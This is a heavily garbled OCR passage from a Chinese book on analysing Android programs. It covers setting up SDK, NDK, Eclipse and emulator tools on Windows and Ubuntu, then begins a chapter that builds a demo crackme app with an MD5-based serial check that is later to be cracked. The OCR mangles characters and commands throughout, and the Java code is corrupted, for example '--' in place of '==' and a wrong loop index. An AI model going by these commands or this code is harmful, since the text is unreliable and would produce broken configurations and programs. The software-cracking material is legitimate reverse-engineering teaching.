境 为 DAandroid-sdk 目录 ， 然 后 将 “D:android-sdktools” 与 “D:vandroid- 
sdkvplatform-tools” 目 录 添 加 到 系统 的 PATH 环境 变量 中 。 添 加 完成 后 打开 一 
个 CMD 窗 口 ， 输 入 “emulator-version” 与 “adb version” 命 令 查看 是 否 能 成 功 运 


行 。 执 行 结果 如 图 1-5 所 示 。 


去 C: WINDOWS systen32Vcnd. exe - 口 | x| 


icrosoft Windows XP [hk 5.1.2600] 
«C» 有 版权 所 有 1985-2081 Microsoft Corp. 


: Documents and Settings WMlidministrator»emulator -version 


C:\Documents and Settings VMldministrator»findroid emulator version 28.8 (build id 
OPENMASTER-391819) 

Copyright «C» 2086-2011 The Android Open Source Project and many others. 

This program is a derivative of the QEMU CPU emulator €Xwwwvu.qemu.org?. 


This software is licensed under the terms of the GNU General Public 
License version 2. as published by the Free Software Foundation, and 
may be copied, distributed, and modified under those terms. 


This program is distributed in the hope that it vill be useful, 
but WITHOUT ANY WARRANTY; without even the implied warranty of 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 
GNU General Public License for more details. 


C:\Documents and Settings Widministrator»adb version 
Android Debug Bridge version 1.0.29 


;;NDocuments and Settings Administrator?» m 


图 1-5 检查 Android SDK 是 否 正确 安装 


Android SDK 安 装 成 功 后 ， 需 要 通过 SDK 管 理 器 下 载 具体 版 本 的 SDK， 
双击 “D:\android-sdK\SDK Manager.exe” 文 件 ， 打 开 Android SDK Manager, 
运行 后 如 图 1-6 所 示 。 


€ Android SDK Nanager 
Packages Tools 

SDK Path: 

Packages 


Name API Rev. Status 
-0 Tools 
El íi Àndroid SDK Tools 20 Installed 
C'R Android SDK Platform-tools 12 Installed 
*] Android 4.1 (API 16) 
Android 4.0.3 (API 15) 
Android 4.0 (API 14) 
Z] Android 3.2 (API 13) 
Android 3.1 (API 12) 
Android 3.0 (API 11) 
Android 2.3.3 (API 10) 
| Android 2.2 (API 8) 
a Android 2.1 (API T) 
Android 1.6 (API 4) 
Android 1.5 (API 3) 
Extras 


goo000000000 


Show: [V] Updates/New [7]Instslled [] Obsolete Select New or Updates Install 9 packages... 
Sort by: (S API level O Repository Deselect All Delete 1 package... 


O 


| 


Done loading packages. 


图 1-6 Android SDK Manager 运 行 界面 


读者 可 以 根据 自己 的 需要 选择 相应 的 一 个 或 多 个 版 本 进行 下 载 ， 本 书 
选择 了 2.2、2.3.3、4.0、4.0.3、4.1 等 几 个 版 本 ， 点 击 Install package 按 钮 打开 
“Choose Package to Install” 对 话 框 ， 选 择 “Accept Al” 单 选 框 ， 最 后 点 击 
“Install” 按 钮 开始 下 载 ， 下 载 所 需 的 时 间 根 据 网 络 环境 差异 可 能 会 有 所 不 
同 。 


1.1.3 ”安装 Android NDK 


Android NDK 是 Google 提 供 的 开发 Android 原 生 程序 的 工具 包 。 如 今 越 
来 越 多 的 软件 与 病毒 采用 了 基于 Android NDK 动 态 库 的 调用 技术 ， 隐 藏 了 程 
序 在 实现 上 的 很 多 细节 ， 掌 握 Android NDK 程 序 的 分 析 技术 也 成 为 了 分 析 人 


员 必 备 的 技能 ， 本 书 将 会 在 第 7 章 对 Android NDK 程 序 的 特点 以 及 分 析 技 术 
进行 详细 的 讲解 。 

Android NDK 的 下 载 地 W 为 
http://developer.android.com/sdk/ndk/index.html , 目前 最 新 版 本 为 R8， 
Windows 平 台 下 的 完整 下 载 链 接 为 : http://dl.google.com/android/ndk/android- 
ndkr8-windows.zip。 将 下 载 后 的 压缩 包 解 讨 到 人 硬盘 任意 位 置 ， 本 书 为 D 盘 根 
目录 。 新 建 环境 变量 ANDROID_NDK ， 值 为 Di:\android-ndk-r8， 然 后 将 
ANDROID_NDK 添 加 到 PATH 环境 变量 中 ， 做 好 这 一 步 ，Android NDK 就 算 
安装 完成 了 。 

接 下 来 测试 配置 是 否 正确 ， 打 开 一 个 CMD 窗 口 ， 进 入 目录 “Di:\android- 
ndk-r8\samples\hello-jni”， 输 入 “ndk-build” 命 令 编 译 Android NDK FH sii 带 的 
hello-jni 工 程 ， 如 果 输 出 如 图 1-7 所 示 的 结果 ， 就 说 明 Android NDK 安 装 成 功 
了 。 


c* Cz AWINDOWSAsystem32Xcnd. exe 


icrosoft Windows XP [版 本 5.1.26808] 
《C》 有 版 术 了 所 有 1985-28@1 Microsoft Corp. 


;;NDocuments and Settings Mdministrator>d: 
D:*»cd d:'*android-ndk-r8 samples 'hello-jni 


D: sandroid-ndk-r8 samples hello-jni»ndk-build 
dbserver : [arm-linux-androideabi-4.4.3] libs/armeabi/gdbserver 
IGdbsetup : libs/arneabi/qgdb.setup 
“Compile thumb : hello-jni <= hello-jni.c 
ISharedLibrary : libhello-jni.so 
Install : libhello-jni.so => libs/armeabi/libhello-jni.so 


D: android-ndk-r8 samples hello-jni» 


图 1-7 使 用 Android NDKZRi£hello-jni T f 


1.1.4 Eclipse 集成 开发 环境 


Eclipse 是 Android 开发 推荐 使 用 的 IDE。 它 的 下 载 地 址 为 : 
http://www.eclipse.org/downloads ， 选 择 下 载 “Eclipse IDE for Java Developers" 
或 “Eclipse for Mobile Developers” 版 本 即 可 。 强 烈 建议 下 载 使 用 后 者 ， 后 者 
自 带 了 CDT (C/C++Development Tools) 插件 ， 并 针对 手机 开发 做 了 优化 。 

Eclipse 是 一 款 绿色 软件 ， 下 载 完 成 后 解压 到 硬盘 任意 目录 ， 本 书 为 D 盘 
根 目录 。 进 入 “Di\eclipse” 目 录 ， 运 行 eclipse.exe，Eclipse 会 根据 前 面 设置 的 
环境 变量 自动 进行 初始 化 ， 如 果 启 动 时 没有 提示 错误 说 明 安 装 成 功 。 


1.1.5 ”安装 CDT、ADT 插 件 


如 果 读 者 使 用 的 Eclipse 是 For Mobile Developers 版 本 或 自 带 CDT 插 件 ， 
可 以 跳 过 CDT 插 件 的 安装 ， 否 则 需要 手动 安装 CDT 插 件 。 安 装 Eclipse 的 插 
件 比 较 简 单 ， 有 在 线 安装 与 离线 安装 两 种 方式 ， 步 骤 分 别 为 : 

e 启动 Eclipse， 上 点击 菜单 “Help Install New Software” }J 7T Install 对话 
E ， E Wok With" > 320 By A 4% WE 中 输 入 
http://download.eclipse.org/tools/cdt/releases/juno 并 回 车 ， 稍 等 片刻 后 下 面 列 
表 框 就 会 解析 出 CDT 插 件 。 

e 到 Eclipse 官网 上 手动 下 载 最 新 版 的 CDT 插 件 ， 目 前 最 新 8.1.0。 下 载 
地 址 为 http;//www.eclipse.org/cdt/downloads.phpo 启动 Eclipse， 上 点击 菜单 
“Help > Install New Software” 打 开 Install 对 话 框 ， 点 击 界面 上 的 Add 按 钮 ， 打 
开 Add Repository 对 话 框 ， 接 着 点 击 Archive 按 钮 ， 选 择 下 载 的 CDT 压 缩 包 ， 
点 击 OK 按钮 返回 。 

无 论 采 用 上 面 哪 一 种 方式 进行 安装 ， 最 终 都 会 在 Name 下 面 的 列表 中 列 
出 可 供 安 装 的 CDT 插 件 ， 如 图 1-8 所 示 ， 全 部 勾 选 后 点 击 Next 按 钮 即 可 安 
装 ， 在 线 安 装 耗 费 的 时 间 根 据 网 络 环境 差异 可 能 有 所 不 同 。 


Instal1 


Available Software 
Check the items that you wish to install. 


Work with: http://download. eclipse. org/tools/cdt/releases/juno 


Find more software by working with the "Available Software Sites" preferences. 


Name Version 
+) [J000 CIT Main Features 
* [J000 CIT Optional Features 


Select All Deselect All 


Details 
CDT Main Features 1.0.0. TV3- cLSvvETET AETUAAAUMQ 


[v] Show only the latest versions of available software [C] Hide items that are already installed 
[V]Group items by category What is already installed? 

C Show only software applicable to target environment 

DContact all update sites during install to find required software 


图 1-8 安装 CDT 插 件 


ADT 插 件 是 Google 为 Android 开 发 提供 的 Eclipse 插件 ， 方 便 在 Eclipse 开 
发 环境 中 创建 、 编 辑 、 调 试 Android 程 序 。 安 装 过 程 与 CDT 插 件 类 似 。 目 前 
最 新 版 本 为 20.0.0， 官 方 下 载 地 址 为 : http;//dl.google.com/android/ADT- 
200.0.zip ， 在 线 安 Æ 的 repository 地 址 为 
https://dlssl.google.com/android/eclipse/， 读 者 可 以 按照 上 面 的 步骤 自行 完成 
安装 。 

ADT 插 件 安装 完成 后 需要 进行 相应 的 配置 。 点 击 Edlipse 菜 单项 
“Window-Preferences”， 选 择 Android 列 表 项 ， 在 右 侧 SDK Location 处 选择 
Android SDK 的 安装 位 置 ， 如 Di\android-sdk ， 展 开 Android 列 表 项 ， 选 择 
NDK， 在 右 侧 NDK Location 处 选择 Android NDK 的 安装 位 置 ， 如 D:\android- 
ndk-r8。 设置 完 后 点 击 OK 按 钮 关闭 对 话 框 。 到 此 ，CDT 与 ADT 插 件 就 安装 
完成 了 。 


1.1.6 ”创建 Android Virtual Device 


Android SDK 中 提供 了 “Android Virtual Device Manage” LA, 方便 在 没 
有 真实 Android 设 备 环境 的 情况 下 调试 运行 Android 程 序 。 

双击 运行 “Di:\android-sdk-windows\AVD Manager.exe”， 点 击 “New” 按 
钮 ， 打 开 AVD 创 建 对 话 框 ， 在 “Name” 栏 输入 AVD 的 名 称 ， 如 输入 
“Android2.3.3”， 在 Target 一 栏 选择 要 模拟 的 Android 版 本 ， 这 里 选择 “Android 
2.3.3 — API Level 10", SD Card 大 小 指定 为 256MB， 其 它 选 项 保持 不 变 ， 结 
果 如 图 1-9 所 示 。 


Create new Android Virtual Device (AVD) 


Name: Android2.3.3 
Target: Google APIs (Google Inc.) - API Level 10 
CPU/ABI: 
SD Card: 
© Size: |256 
OfFile: | 
Snapshot: 
[ ]Enabled 


@ Built-in: [efant (WVGABOO) v 


O Resolution: | x 


Property Value 
Abstracted LCD density 240 
Max VM application h... 24 
Device ram size 256 


图 1-9 创建 AVD 


点 击 “Create AVD” 按 钮 完成 AVD 的 创建 。 选 中 创建 的 AVD， 点 击 右 侧 的 
“Start” 按 钮 ， 如 果 没 有 错误 会 成 功 启 动 这 个 Android 虚 拟 设备 。 

如 果 使 用 真实 Android 设 备 来 调试 程序 ， 需 要 先 在 设备 的 “设置 > 程序 ~ 
开发 ”选项 中 开启 “USB 调 试 *"， 然 后 安装 相应 设备 厂商 提供 的 USB 驱 动 程 


序 。 一 份 常见 的 USB 驱动 程序 下 载 地 址 列表 可 以 在 
http://developer.android.com/tools/extras/oem-usb.html 中 找到 。 安 装 完 驱动 后 
在 命令 提示 符 下 输入 “adb devices” 就 可 以 列 出 连接 的 Android 设 备 了 。 


1.1.7 ”使 用 到 的 工具 


分 析 Android 程 序 需要 用 到 很 多 工具 ， 包 括 : 反 编 译 工具 、 静 态 分 析 工 
具 、 动 态 调试 工具 、 集 成 分 析 环 境 等 。 所 有 的 工具 中 ， 大 多 数 是 开源 或 免 
费 的 软件 ， 笔 者 在 此 不 详细 列 出 使 用 到 的 工具 ， 在 每 一 章 对 知识 点 进行 介 
绍 时 ， 会 同时 介绍 相关 工具 的 使 用 方法 与 下 载 地 址 。 


12 Linux 分 析 环 境 搭建 


本 书 中 介绍 的 windows 环 境 下 的 大 多 数 操 作 ， 在 Linux 环 境 下 同样 适 
用 。 本 节 将 介绍 如 何在 Linux 环 境 下 搭建 Android 程 序 的 分 析 环 境 。 


1.2.1 ”本 书 的 Linux 环 境 


本 书 在 写作 时 使 用 的 Linux 环 境 为 Ubuntu 10.04 32 位 系统 ， 在 最 后 一 章 
进行 Android 病 毒 分 析 时 使 用 的 是 Ubuntu 12.04 32 位 系统 。 


1.2.2 ”安装 JDK 


首先 在 当前 用 户主 目录 下 新 建 tools 目 录 来 存放 Android 分 析 常 用 的 工 
具 。 

到 Oracle 官 方 网 站 下 载 JDK 安 装 包 。 本 书 Ubuntu 平台 使 用 的 版 本 为 jdk- 
6u33-linux-i586 下 载 地 址 为 


http;//www.oracle.com/technetwork/java/javase/downloads/index.html ， 将 下 载 


的 jdk-6u33-linux-i586.bin 文 件 放 到 /home/feicong/tools 目 录 (feicong 为 本 机 用 
户 名 ) ， 打 开 一 个 终端 环境 输入 以 下 命令 : 

cd tools 

chmod +x ./jdk-6u33-linux-i586.bin 

./jdk-6u33-linux-i586.bin 

此 时 安装 程序 会 自动 将 JDK 安 装 到 当前 目录 的 jdk1.6.0 33 目录 下 。 接 着 
设置 环境 变量 ， 执 行 : 

sudo gedit /etc/profile 

在 配置 文件 中 加 入 如 下 部 分 : 

export JAVA HOME-/home/feicong/jdk1.6.0 33 

export JRE HOME-/home/feicong/jdk1.6.0 33/jre 

export PATH-/home/feicong/jdk1.6.0 33/bin:$PATH 

export CLASSPATH-.:/home/feicong/jdk1.6.0, 33/lib:/home/feicong/jdk1.6.0  33/ 

jre/lib 

保存 后 退出 ， 在 终端 提示 符 中 输入 如 下 命令 使 环境 变量 生效 : 

source /etc/profile 

最 后 输入 命令 “java -version” 验 证 JDK 是 否 安装 成 功 ， 如 图 1-10 所 示 。 

文件 (F) 编辑 (E) 查看 (V) 终端 (T) 帮助 (H) 


opening the register.html file (located in the JDK installation 
directory) in a browser. 


For more information on what data Registration collects and 
how it is managed and used, see: 
http://java.sun.com/javase/registration/JDOKRegistrationPrivacy.html 


Press Enter to continue 


Done. 

feicongaGfeicong-ubuntu:-/tools$ sudo gedit /etc/profile 
[sudo] password for feicong: 
feicongGfeicong-ubuntu:-/tools$ source /etc/profile 
feicongaüfeicong-ubuntu:-/tools$ java -version 

java version "1.6.0 33" 

Java(TM) SE Runtime Environment (build 1.6.0 33-b03) 
Java HotSpot(TM) Server VM (build 20.8-b03, mixed mode) 
feicong&feicong-ubuntu:-/tools$ J a 


图 1-10 ”验证 JDK 是 否 安装 成 功 


1.2.3 ”在 Ubuntu 上 安装 Android SDK 


Ubuntu 上 安装 Android SDK 与 Windows 安 装 步 骤 类 似 ， 首 先 到 官方 网 站 
http://developer.android.com/sdk/index.html F && Android SDK ， 目 前 最 新 版 本 
为 r20， 下 载 后 将 android-sdk_r20-linux.tgz 压 缩 包 文件 放 到 tools 目 录 ， 执 行 以 
下 命令 进行 解 包 : 

tar zvxf android-sdk r20-linux.tgz 

解 包 完毕 后 就 会 在 当前 目录 下 出 现 android-sdk-linux 目 录 了 。 这 个 目录 
的 内 容 与 Windows 平 台 提 供 的 工具 类 似 。 接 着 设置 环境 变量 ， 执 行 : 

sudo gedit /etc/profile 


在 配置 文件 中 加 入 如 下 部 分 : 


export PATH-/home/feicong/tools/android-sdk-linux/platform-tools:$PATH 
export PATH-/home/feicong/tools/android-sdk-linux/tools:S$PATH 


保存 后 退出 ， 在 终端 提示 符 中 输入 “source/etcoprofile” 使 环境 变量 生效 。 
输入 “emulator > version” 5 “adb version” 命 令 查 看 是 否 能 成 功 运行 。 如 果 出 


现 如 图 1-11 所 示 的 画面 说 明 设置 成 功 。 


文件 (F) 编辑 (E) 查看 (V) 终端 (T) 帮助 (H) 


android-sdk-linux/tools/etcltool 

android-sdk-linux/tools/mksdcard 

android-sdk-linux/tools/traceview 
android-sdk-linux/tools/emulator-arm 

feicongGfeicong-ubuntu:-/tools$ sudo gedit /etc/profile 

[sudo] password for feicong: 

feicongaüfeicong-ubuntu:-/tools$ source /etc/profile 
feiconggfeicong-ubuntu:-/tools$ emulator -version 

Android emulator version 18.0 (build id MASTER-306762) 

Copyright (C) 2006-2011 The Android Open Source Project and many others. 
This program is a derivative of the QEMU CPU emulator (www.qemu.org). 


This software is licensed under the terms of the GNU General Public 
License version 2, as published by the Free Software Foundation, and 
may be copied, distributed, and modified under those terms. 


This program is distributed in the hope that it will be useful, 
but WITHOUT ANY WARRANTY; without even the implied warranty of 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 
GNU General Public License for more details. 


feicongGfeicong-ubuntu:-/tools$ adb version 
Android Debug Bridge version 1.0.29 
feicongGfeicong-ubuntu:-/tools$ 


图 1-11 测试 Android SDK 


配置 好 环境 后 就 需要 下 载 具 体 版 本 的 SDK 了 ， 在 终端 提示 符 中 输入 
android 命 令 启 动 Android SDK Manager， 接 下 来 的 下 载 步 又 与 Windows 平 台 
是 一 样 的 ， 具 体操 作 这 里 就 不 再 榴 述 了 。 


1.2.4 在 Ubuntu 上 安装 Android NDK 


首先 到 Android 官 方 网 站 http://developer.android.com/sdk/ndk/index.html 
下 载 Android NDK， 目 前 Linux 平 台 的 最 新 版 本 为 r18， 将 下 载 的 android-ndk- 
r8-linux-x86.tarbz2 文 件 放 到 tools 目 录 ， 在 终端 提示 符 下 输入 以 下 命令 解 
包 : 

tar jxvf ./android-ndk-r8-linux-x86.tar.bz2 

解 包 完毕 后 就 会 在 当前 目录 下 出 现 android-ndk-r8 目 录 了 。 接 着 设置 环 
境 变 量 ， 执 行 : 

sudo gedit /etc/profile 


在 配置 文件 中 加 入 如 下 部 分 : 


export ANDROID NDK-/home/feicong/tools/android-ndk-r8 

export PATH-/home/feicong/tools/android-ndk-r8:$PATH 

保存 文件 后 退出 ， 在 终端 提示 符 中 输入 “source/etc/profile” 使 环境 变量 生 
效 。 接 下 来 在 终端 提示 符 下 进入 android-ndk-r8/samples/hello-jni 目 录 ， 然 后 
输入 ndk-build 命 令 编 译 hello-jni 工 程 ， 如 果 配 置 正确 ， 执 行 结果 如 图 1-12 所 
/J\o 


文件 (F) 编辑 (E) 查看 (V) 终端 (T) 帮助 (H) 


android-ndk-r8/build/tools/toolchain-patches/gdb/0004-ndk-Fix-MIPS-builds-on-Dargl 
Wwin.patch 
android-ndk-r8/build/tools/toolchain-symbols/ 
android-ndk-r8/build/tools/toolchain-symbols/arm/ 
android-ndk-r8/build/tools/toolchain-symbols/arm/libgcc.a.functions.txt 
android-ndk-r8/build/tools/toolchain-symbols/mips/ 
android-ndk-r8/build/tools/toolchain-symbols/mips/libgcc.a.functions.txt 
android-ndk-r8/build/tools/toolchain-symbols/x86/ 
android-ndk-r8/build/tools/toolchain-symbols/x86/libgcc.a.functions.txt 
android-ndk-r8/RELEASE.TXT 
android-ndk-r8/README.TXT 
android-ndk-r8/GNUmakefile 
feicongGfeicong-ubuntu:-/tools$ sudo gedit /etc/profile 
[sudo] password for feicong: 
feiconggGfeicong-ubuntu:-/tools$ cd android-ndk-r8/ 
feiconggGfeicong-ubuntu:-/tools/android-ndk-r8$ cd samples/ 
feicongafeicong-ubuntu:-/tools/android-ndk-r8/samples$ cd hello-jni/ 
feicongGfeicong-ubuntu:-/tools/android-ndk-r8/samples/hello-jni$ ndk-build 
: [arm-linux-androideabi-4.4.3] libs/armeabi/gdbserver 
: libs/armeabi/gdb.setup 
: hello-jni «- hello-jni.c 
SharedLibrary : libhello-jni.so 
Install : libhello-jni.so -» libs/armeabi/libhello-jni.so 
feicongafeicong-ubuntu: -/tools/android-ndk-r8/samples/hello-jni$ 


图 1-12 ”使 用 Android NDK 编 译 工 程 


1.2.5 ”在 Ubuntu 上 安装 Eclipse 集成 开发 环境 


首先 到 Eclipse 官方 网 站 http:/www.eclipse.org/downloads/ 下 载 Eclipse IDE 
for Java Developers 版 本 ， 将 下 载 到 的 eclipse-jee-indigo-SR2-linux-gtk.tar.gz 文 
件 放 到 tools 目 录 ， 输 入 以 下 命令 解 包 : 

tar zxvf ./eclipse-jee-indigo-SR2-linux-gtk.tar.gz 

解 包 完毕 后 就 会 在 当前 目录 下 出 现 eclipse 目 录 。 有 目录 中 的 eclipse 文 件 就 
是 主 程序 ， 为 方便 以 后 使 用 可 以 在 桌面 上 建立 快捷 方式 。 


1.2.6” 在 Ubuntu 上 安装 CDT、ADT 插 件 


Ubuntu 上 安装 CDT、ADT 插 件 与 Windows 平 台 上 的 安装 步骤 是 一 样 的 ， 
读者 可 以 参考 1.1.5 小 节 内 容 进行 安装 ， 这 里 不 再 歼 述 。 


1.2.7 创建 Android Virtual Device 


Linuxh&BS Android SDK 没 有 提供 可 视 化 的 AVD Manager 管 理工 具 ， 创 建 
AVD 可 以 使 用 android 命 令 。 在 终端 提示 符 下 输入 “android list targets” 列 出 本 
机 已 经 下 载 好 的 SDK， 本 机 输出 结果 如 下 : 


feicong@feicong-ubuntu:~/tools$ android list targets 


Available Android targets: 


id: 2 or "android-8" 
Name: Android 2.2 
Type: Platform 
API level: 8 
Revision: 3 
Skins: WVGA800 (default), HVGA, QVGA, WVGA854, WQVGA432, WQVGA400 
ABIs : armeabi 
id: 3 or "android-10" 
Name: Android 2.3.3 
Type: Platform 
API level: 10 
Revision: 2 
Skins: WVGA800 (default), HVGA, QVGA, WVGA854, WQVGA432, WQVGA400 


ABIs : armeabi 


id: 6 or "android-15" 

Name: Android 4.0.3 

Type: Platform 

API level: 15 

Revision: 3 

Skins: WSVGA, WVGA800 (default), HVGA, QVGA, WVGA854, WXGA720, WXGABS800, 
WQVGA432, WQVGAA400 


ABIs : armeabi-v7a 


每 一 个 id 对 应 一 个 版 本 的 SDK。 这 个 id 在 创建 AVD 时 会 使 用 到 。 创 建 
AVD 的 命令 格式 为 “android create avd --name «your avd_name> --target 
<targetID>”， 比 如 想 要 创建 Android 系 统 版 本 为 2.3.3 且 名 称 为 android2.3.3 的 
AVD 只 需 在 终端 提示 符 下 输入 如 下 命令 : 


android create avd --name android2.3.3 --target android-10 


创建 AVD 完 成 后 可 以 使 用 emulator 来 启动 它 ， 在 终端 提示 符 下 输入 命 


M 


emulator -avd android2.3.3 


终 运 行 效果 如 图 1- 13 所 示 。 


OO OQ feicongGfeicong-ubuntu: ~/tools 
文件 (F) (E) 查看 (V) 终端 (T) 帮助 (H) 


feicong dura ubuntu:-/tools$ android create avd --name androi 
android- 

i ME single ABI armeabi 

Android 2.3.3 is a basic Android platform. 

Do you wish to create a custom hardware profile [no]no 

Created AVD 'android2.3.3' based on Android 2.3.3, ARM (armeabi) 
with the following hardware config: 

hw.lcd.density-240 

vm.heapSize-24 

hw.ramSize-256 

feicong&feicong-ubuntu:-/tools$ emulator -avd android2.3.3 
emulator: emulator window was out of view and was recentered 
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1-13 Android 模 拟 器 运行 界面 


如 果 使 用 真实 Android 设 备 来 调试 程序 ， 还 需要 做 一 些 工作 。 首 先 需 
在 设备 的 “设置 ~ 程序 ~ 开发 ”选项 中 开启 “USB 调 试 ”， 接 着 将 设备 连接 电 
脑 ， 在 终 i et 令 查 看 连接 的 USB 设 备 。 我 的 测试 机 型 为 
Moto XT615， 命 令 执 行 后 会 得 到 如 下 输入 。 


feicongGéfeicong-ubuntu:-$ lsusb 

Bus 003 Device 002: ID 15d9:0a4c Dexon 

Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub 

Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub 

Bus 001 Device 005: ID 0bda:0158 Realtek Semiconductor Corp. Mass Storage Device 
Bus 001 Device 004: ID 22b8:2de6 Motorola PCS 

Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub 


E. rR22b873 Vendor id 值 ，2de6 为 Product id。 不 同 的 设备 厂商 Vendor id 
值 不 同 。 可 以 在 http://developer.android.com/tools/device.html#Vendorlds 找 到 
一 份 常见 设备 厂商 的 Vendor id 列 表 。Product id 则 是 具体 产品 的 id 值 。 同 一 厂 
商 的 不 同 设备 Vendor id 相同 而 Product id 不 同 。 记 录 下 Vendor id E Product id 
值 ， 然 后 编辑 udev 规 则 文件 /etwudewrules.d/70-android.rules， 没 有 则 创建 ， 
内 容 如 下 。 

SUBSYSTEM=="usb", ATTR{idVendor}=="22b8", MODE="2de6", GROUP="plugdev" 

其 中 的 22b8 与 2de6 根 据 自己 的 Vendor id 与 Product id 值 进行 相应 的 更 
改 ， 修 改 保存 后 退出 ， 在 终端 提示 符 中 输入 命令 “adb devices” 就 能 列 出 配置 
好 的 Android 设 备 了 。 


1.2.8 ”使 用 到 的 工具 


本 书 讲解 Android 程 序 分 析 时 使 用 到 的 工具 大 多 数 是 跨 平 台 的 ， 这 些 工 
具 同 时 拥有 Windows 版 本 与 Linux 版 本 ， 笔 者 在 介绍 它们 时 会 给 出 相应 工具 
的 下 载 地 址 ， 并 且 给 出 其 安装 方法 。 另 外 ， 本 书 中 也 有 个 别 的 工具 是 与 平 
台 相关 的 ， 笔 者 在 书 中 都 有 详细 的 说 明 。 


1.3 ”本 章 小 结 


本 章 主 要 介绍 了 分 析 Android 程 序 时 常用 到 的 一 些 工 具 ， 熟 练 掌握 这 些 
工具 的 使 用 是 分 析 Android 程 序 的 基础 ， 接 着 介绍 了 Windows 平 台 与 Ubuntu 
平台 下 Android 开 发 环境 的 搭建 ， 为 后 面 的 分 析 环 境 做 准备 。 在 学 习 完 本 章 


后 ， 读 者 可 以 自行 下 载 本 章 所 提 及 到 的 工具 ， 动 手 练习 如 何 使 用 它们 ， 这 


些 工具 的 具体 使 用 会 在 本 书后 面 章 节 逐 一 进行 介绍 。 


第 2 章 ”如 何 分 析 Android 程 序 


分 析 Android 程 序 是 开发 Android 程 序 的 一 个 逆 过 程 。 然 而 作为 分 析 人 
员 ， 掌 握 分 析 技 术 还 得 从 开发 学 起 ， 这 个 学 习 的 路 线 应 该 是 呈 线 性 的 、 循 
序 渐进 的 。 要 想 分 析 一 个 Android 程 序 ， 首 先 应 该 了 解 Android 程 序 开发 的 流 
程 、 程 序 结构 、 语 句 分 支 、 解 密 原理 等 。 本 章 将 以 走马 观 花 的 形式 ， 从 开 
发 Android 程 序 开始 ， 到 最 终 分 析 并 破解 这 个 程序 ， 将 这 一 完整 路 线 展现 出 
来 。 


2.1 编写 第 一 个 Android 程 序 


本 节 将 采用 Android 官 方 推荐 的 Eclipse 集成 开发 环境 来 编写 一 个 Android 
应 用 程序 。 


2.1.1 ”使 用 Eclipse 创建 Android 工 程 


启动 Eclipse， 新 建 一 个 Android 工程 。“Application Name” 为 
Crackme0201 , “Project Name" 7j crackme02 , “Package Name” 为 
com.droider.crackme0201， 其 他 保持 默认 ， 设 置 好 后 如 图 2-1 所 示 。 


É— Wew Android App 


New Android Application 
Creates a new Android Application 


Application Name: @|Crackme0201 


Project Name: G|crackme02 


Package Name: @|com. droi der. crackme0201| 


Build SDK:O|Android 2.2 (API 8) 


Minimum Required SDK: 6| API 8: Android 2.2 (Froyo) 


[v] Create custom launcher icon 
[C ]Mark this project as a library 
[v]Create Project in Workspace 


The package name must be a unique identifier for your application. 

It is typically not shown to users, but it *must* stay the same for the lifetime of your 
application; it is how multiple versions of the same application are considered the "same app". 
This is typically the reverse domain name of your organization plus one or more application 
identifiers, and it must be a valid Java package name. 


图 2-1 ”使 用 Eclipse 创建 Android 工 程 


一 路 单 击 Next 按 钮 ， 最 后 点 击 Finish 按 钮 完成 工程 的 创建 。 打 开工 程 的 
activity_main.xml 布 局 文件 ， 添 加 用 户 名 与 注册 码 编辑 框 ， 修 改 完成 后 ， 最 
终 界面 效果 如 图 2-2 所 示 。 


: Structure 


default ~ Nexus One v ~ vr hppThene ~ 1a Oatlise 


QMHainActivity ~ Q - m8 -~ B H LinearLayout 
EARE [Ab] textViewl -“Android 程 序 破解 演示 实例 
m=) | 回 | 国 | G A Q Q A (Z) [|] LinearLayout 
一 一 一 —— [Ab] TextView - “用户 名: “" 
2| [r4 | ^ (I]edit username (EditText) 
S| 四 LinearLayout 
[AÐ] TextView -“ 注 册 玛 ;” 
{I | edit_sn (EditText) 
m button register - iT m' 


Android 程 序 破解 演示 实例 
用 户 名 : | 请 输入 用 户 名 


注册 码 : ， 请 输入 16 位 的 注册 码 


[3 Properties A mE 
Id 
| 注册 | Layout Parame... [] 
Gravity 
Width fill_parent 
Weight fill parent 
| 由 Margins .ü 
Ürientation vertical 
Gravity 
Gravity | 
Content Descr... 

-| LinearLayout ü 
Ürientation vertical 
Baseline Aligned 

{v Baseline Align... 


— *W.--La C.— 


图 2-2 crackmefgFr i 


接着 编写 MainActivity 类 的 代码 ， 添 加 一 个 checkSN0O 方 法 ， 代 码 如 下 : 


private boolean checkSN(String userName, String sn) ( 


try 1 
if ((userName -- null) || (userName.length() -- 0)) 
return false; 
if ((sn -- null) || (sn.length() t=: 16)) 


return false; 
MessageDigest digest - MessageDigest.getInstance("MD5"); 
digest.reset(); 
digest.update(userName.getBytes()); 
byte[] bytes - digest.digest(); // 采 用 MD5 对 用 户 名 进行 Hash 
String hexstr = toHexString(bytes, ""); / /将 计算 结果 转化 成 字符 串 
StringBuilder sb = new StringBuilder(); 
for (int i = 0; i < hexstr.length(); i += 2) ( 
sb.append(hexstr.charAt(1)); 
) 


String userSN = sb.toString(); // 计 算出 的 SN 
if (!userSN.equalsIgnoreCase(sn))  // 比 较 注册 人 码 是 否 正 确 


return false; 
) catch (NoSuchAlgorithmException e) { 
e.printStackTrace(); 
return false; 


) 


return true; 
} 


这 个 方法 的 主要 功能 是 计算 用 户 名 与 注册 码 是 否 匹 配 。 计 算 的 步骤 
为 : 使 用 MD5 算 法 计算 用 户 名 字符 串 的 Hash， 将 计算 所 得 的 结果 转换 成 长 
度 为 32 位 的 十 六 进 制 字符 串 ， 然 后 取 字 符 串 的 所 有 奇数 位 重新 组 合生 成 新 
的 字符 串 ， 这 个 字符 串 就 是 最 终 的 注册 码 ， 最 后 将 它 与 传 入 的 注册 码 进行 
比较 ， 如 果 相 同 表示 注册 码 是 正确 的 ， 反 之 注册 码 是 错误 的 。 

接着 在 MainActivity 的 OnCreate0 方 法 中 加 入 注册 按钮 点 击 事件 的 监听 
器 ， 如 果 用 户 名 与 注册 码 匹 配 就 弹出 注册 成 功 的 提示 ， 不 匹配 则 提示 无 效 
的 用 户 名 或 注册 码 ， 代 码 如 下 : 


public void onCreate(Bundle savedInstanceState) ( 
super.onCreate(savedInstanceState); 
setContentView(R.layout.activity main); 
setTitle(R.string.unregister);  // 模 拟 程序 未 注册 
edit userName = (EditText) findViewById(R.id.edit, username); 
edit sn - (EditText) findViewById(R.id.edit sn); 
btn register - (Button) findViewById(R.id.button register); 


btn register.setOnClickListener(new OnClickListener() ( 


